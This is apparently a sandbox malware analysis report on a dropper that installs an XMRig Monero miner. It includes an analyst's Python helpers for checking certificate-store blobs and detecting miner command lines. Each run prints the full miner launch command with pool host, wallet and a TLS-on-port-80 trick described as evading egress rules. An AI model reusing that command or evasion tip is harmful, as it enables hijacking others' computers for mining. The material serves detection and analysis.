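    return b"".join(struct.pack("<III", pid, 1, len(data)) + data for pid, data in props.items())


def is_well_formed(blob: bytes) -> bool:
    try:
        parse_cert_blob(blob)
        return True
    except ValueError:
        return False


def check_blob(key_name: str, blob: bytes) -> dict:
    """Summarise the blob and verify that its hashes agree with the registry key name."""
    props = parse_cert_blob(blob)
    key = key_name.lower()
    cert = props.get(0x20)
    name = props.get(0x0B)
    return {
        "records": [PROP_NAMES.get(p, f"0x{p:02x}") for p in props],
        "friendly_name": name.decode("utf-16-le").rstrip("\x00") if name else None,
        "sha1_prop": props[0x03].hex() if 0x03 in props else None,
        "sha256_prop": props[0x62].hex() if 0x62 in props else None,
        "key_name_matches_sha1_prop": props[0x03].hex() == key if 0x03 in props else None,
        "has_certificate": cert is not None,
        # The decisive check: the key name must be the SHA-1 of the DER certificate itself
        "cert_hash_matches_key_name": hashlib.sha1(cert).hexdigest() == key if cert else None,
    }


REPORT_KEY_NAME = "D1EB23A46D17D68FD92564C2F1F1601764D8E349"
# First nine records of the Blob written under AuthRoot\Certificates\<REPORT_KEY_NAME>
# in behavioral9, copied from this report (header fields, then data, one record per group).
# The final CERT_CERT_PROP_ID record (0x436 bytes of DER) is not reproduced here.
REPORT_BLOB_PREFIX = bytes.fromhex(
    "19000000" "01000000" "10000000" "2aa1c05e2ae606f198c2c5e937c97aa2"
    "03000000" "01000000" "14000000" "d1eb23a46d17d68fd92564c2f1f1601764d8e349"
    "1d000000" "01000000" "10000000" "2e0d6875874a44c820912e85e964cfdb"
    "14000000" "01000000" "14000000" "a0110a233e96f107ece2af29ef82a57fd030a4b4"
    "0b000000" "01000000" "1c000000" "5300650063007400690067006f002000280041004100410029000000"
    "62000000" "01000000" "20000000" "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"
    "53000000" "01000000" "43000000"
    "30413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0"
    "301b060567810c010330123010060a2b0601040182373c0101030200c0"
    "09000000" "01000000" "54000000"
    "305206082b0601050507030206082b06010505070303060a2b0601040182370a0304"
    "06082b0601050507030406082b0601050507030606082b06010505070307"
    "06082b0601050507030106082b06010505070308"
    "0f000000" "01000000" "14000000" "3e8e6487f8fd27d322a269a71edaac5d57811286"
)


def constructed_example() -> dict:
    """Round trip on constructed data (not from the report): a placeholder 'certificate'
    whose SHA-1 is used as the key name, so both cross-checks come back True."""
    fake_cert = b"\x30\x03\x02\x01\x01"  # placeholder bytes, not a real certificate
    digest = hashlib.sha1(fake_cert)
    blob = build_blob({0x03: digest.digest(),
                       0x0B: "example\0".encode("utf-16-le"),
                       0x20: fake_cert})
    return check_blob(digest.hexdigest().upper(), blob)


if __name__ == "__main__":
    from pprint import pprint
    pprint(check_blob(REPORT_KEY_NAME, REPORT_BLOB_PREFIX))
    pprint(constructed_example())
```

Feed check_blob the raw bytes of a Blob value exported from the registry together with the name of the key it sits under. A False in cert_hash_matches_key_name, or a friendly name and subject that are not a root you recognise, is the case in which this signature deserves its name; the AuthRoot write in this report decodes to a known public root.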
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1144 wrote to memory of 3228 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1144 wrote to memory of 3228 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
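The launch string is identical across the four runs on this page (behavioral19, behavioral7, behavioral9 and behavioral16): the dropper, main - Copy (N).exe, executes a dropped xmrig 6.21.0 from %TEMP% (the github.com and objects.githubusercontent.com connections under Network and the xmrig-6.21.0 directory name are consistent with the stock release archive being fetched at run time) with pool, wallet, password, donate level and a pinned pool TLS fingerprint all on the command line. Two details are worth keying on: --tls combined with port 80 (TLS to a plaintext port, which gets through egress rules that allow 80 but not 3333 or 443 to arbitrary hosts), and the Monero address passed as --user, which survives renaming the binary. The SeLockMemoryPrivilege rows under AdjustPrivilegeToken are XMRig requesting large pages, and a parent writing into a child it has just created is typical of ordinary process creation, so the command line is the highest-value artifact in these runs. The script below is an added example (not code from the report, from XMRig, or from the sample) that pulls those indicators out of process-creation records, normalises the long and short xmrig option spellings and the --url=host:port form, and flags the record. The records it runs on are constructed from the behavioral7 row above plus a hypothetical renamed-binary case and a benign one; the address check is a shape check (length and Monero base58 alphabet), not a checksum.

```python
"""Pull the mining indicators out of process-creation records (Sysmon event 1 /
Security 4688 style) for an XMRig launch like the ones in this report."""
from __future__ import annotations

import re
import shlex
from dataclasses import dataclass, field

# xmrig accepts long and short spellings for the options that carry indicators
VALUE_OPTIONS = {
    "--url": "url", "-o": "url",
    "--user": "user", "-u": "user",
    "--pass": "password", "-p": "password",
    "--tls-fingerprint": "tls_fingerprint",
    "--donate-level": "donate_level",
}
FLAG_OPTIONS = {"--tls": "tls", "--background": "background"}

# Shape check only, no checksum: standard and sub-addresses are 95 characters,
# integrated addresses 106, all in Monero's base58 alphabet (no 0, O, I, l)
MONERO_ADDR = re.compile(r"^(?:[48][1-9A-HJ-NP-Za-km-z]{94}|4[1-9A-HJ-NP-Za-km-z]{105})$")
PLAINTEXT_PORTS = {80, 8080}  # --tls to one of these is a blend-in / egress-filter dodge


@dataclass
class MinerIndicators:
    image: str
    pool_host: str | None = None
    pool_port: int | None = None
    wallet: str | None = None
    tls: bool = False
    tls_fingerprint: str | None = None
    donate_level: int | None = None
    reasons: list[str] = field(default_factory=list)

    @property
    def is_miner(self) -> bool:
        return "xmrig-image-name" in self.reasons or "monero-wallet-as-user" in self.reasons


def parse_miner_cmdline(cmdline: str) -> MinerIndicators:
    # posix=False keeps the backslashes of Windows paths; quotes are stripped by hand
    toks = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    ind = MinerIndicators(image=toks[0] if toks else "")
    values: dict[str, str] = {}
    flags: set[str] = set()
    i = 1
    while i < len(toks):
        key, has_eq, inline = toks[i].partition("=")  # handles --url=host:port too
        if key in FLAG_OPTIONS:
            flags.add(FLAG_OPTIONS[key])
        elif key in VALUE_OPTIONS:
            if has_eq:
                values[VALUE_OPTIONS[key]] = inline
            elif i + 1 < len(toks):
                i += 1
                values[VALUE_OPTIONS[key]] = toks[i]
        i += 1

    if "url" in values:
        bare = re.sub(r"^[a-z+]+://", "", values["url"])  # drop stratum+tcp:// and friends
        host, sep, port = bare.rpartition(":")
        if sep and port.isdigit():
            ind.pool_host, ind.pool_port = host, int(port)
        else:
            ind.pool_host = bare
    ind.wallet = values.get("user")
    ind.tls = "tls" in flags
    ind.tls_fingerprint = values.get("tls_fingerprint", "").lower() or None
    if values.get("donate_level", "").isdigit():
        ind.donate_level = int(values["donate_level"])

    basename = re.split(r"[\\/]", ind.image)[-1].lower()
    if "xmrig" in basename:
        ind.reasons.append("xmrig-image-name")
    if ind.wallet and MONERO_ADDR.match(ind.wallet):
        ind.reasons.append("monero-wallet-as-user")
    if ind.tls and ind.pool_port in PLAINTEXT_PORTS:
        ind.reasons.append("tls-on-plaintext-port")
    if ind.tls_fingerprint and re.fullmatch(r"[0-9a-f]{64}", ind.tls_fingerprint):
        ind.reasons.append("pinned-pool-tls-fingerprint")
    if ind.donate_level is not None:
        ind.reasons.append("donate-level-set")
    return ind


def scan_process_events(events: list[dict]) -> list[tuple[dict, MinerIndicators]]:
    """Return (event, indicators) for every record whose command line looks like a miner."""
    hits = []
    for ev in events:
        ind = parse_miner_cmdline(ev["CommandLine"])
        if ind.is_miner:
            hits.append((ev, ind))
    return hits


# Wallet from the command line in this report
WALLET = "46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR"

# Constructed sample records modelled on the behavioral7 run (not a real log export)
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe",
     "Image": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe",
     "CommandLine": r"xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user " + WALLET +
                    " --pass T --donate-level 1 --tls --tls-fingerprint "
                    "420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14"},
    # hypothetical: renamed binary, short options, url= form; the wallet shape still catches it
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\ProgramData\svchost.exe",
     "CommandLine": "svchost.exe -o=stratum+ssl://pool.example.invalid:443 -u " + WALLET + " -p x"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" C:\Users\Admin\notes.txt'},
]

if __name__ == "__main__":
    for ev, ind in scan_process_events(SAMPLE_EVENTS):
        print(ev["Image"], "->", ind.pool_host, ind.pool_port, ind.reasons)
```

The wallet and the pool host are the indicators to pivot on across hosts, since both stay constant when the binary is renamed or re-downloaded; the TLS fingerprint identifies the pool's certificate, not the operator, and changes whenever the pool rotates it.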
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 52.111.227.14:443 | | tcp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.112.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:08
Platform
win10v2004-20240426-en
Max time kernel
1799s
Max time network
1805s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [binary blob data omitted] | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [binary blob data omitted] | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4080 wrote to memory of 4828 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4080 wrote to memory of 4828 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:08
Platform
win10v2004-20240426-en
Max time kernel
1796s
Max time network
1790s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [binary blob data omitted] | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [binary blob data omitted] | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4948 wrote to memory of 3580 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4948 wrote to memory of 3580 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:08
Platform
win10v2004-20240508-en
Max time kernel
1800s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1476 wrote to memory of 3764 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1476 wrote to memory of 3764 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3764-57-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-58-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-59-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-60-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-61-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-62-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-63-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-64-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-65-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-66-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-67-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-68-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-69-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-70-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-71-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-72-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-73-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-74-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-75-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-76-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-77-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-78-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-79-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-80-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-81-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-82-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-83-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-84-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:08
Platform
win10v2004-20240426-en
Max time kernel
1790s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
